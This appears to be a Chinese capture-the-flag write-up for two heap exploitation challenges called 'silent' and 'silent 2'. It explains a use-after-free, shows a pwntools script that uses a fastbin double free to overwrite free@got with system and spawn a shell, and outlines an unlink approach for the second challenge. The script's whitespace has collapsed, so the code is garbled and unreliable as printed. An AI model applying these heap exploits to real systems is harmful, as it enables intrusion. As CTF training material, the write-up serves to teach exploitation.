silent
漏洞位置:free后没有给指针置空,edit也没有检查chunk是否free
利用思路:利用uaf把chunk进入fastbin中,构造三个单链表来写free@got然后getshell
程序没有输出,这是一个难点,所以直接写
查表
objdump-d-j.plt silent//查pltobjdump-R silent//查got在free@got上构造fake_chunk
frompwnimport*local=1iflocal:p=process('./silent')libc=ELF('./libc-2.23.so')else:p=remote('39.107.32.132',10000)#nc 39.107.32.132 10000libc=ELF('./libc-2.23.so')defalloc(size,content):p.sendline('1')p.sendline(str(size))p.sendline(str(content))defdelete(idx):p.sendline('2')p.sendline(str(idx))defedit(idx,content):p.sendline('3')p.sendline(str(idx))p.sendline(content)p.sendline('')elf=ELF('./silent')fake_chunk=0x601ffasystem_plt=0x400730alloc(0x50,aaaa)#0alloc(0x50,bbbb)#1alloc(0x50,cccc)#2delete(0)delete(1)delete(0)#fastbin->chunk0->chunk1->chunk0alloc(0x50,p64(fake_chunk))#fastbin->chunk1->chunk0->fake_chunkalloc(0x50,'bin/sh\x00')#fastbin->chunk0->fake_chunkalloc(0x50,aaaa)alloc(0x50,'a'*0xe+p64(system_plt))delete(1)p.interactive()silent 2
漏洞位置:free后没有给指针置空,edit也没有检查chunk是否free
利用思路:不能像上一题一样用fastbin了,大体思路是,因为是partial relro,利用unlink修改malloc返回的数组指针为free_got,这样修改改数组时就是修改free_got
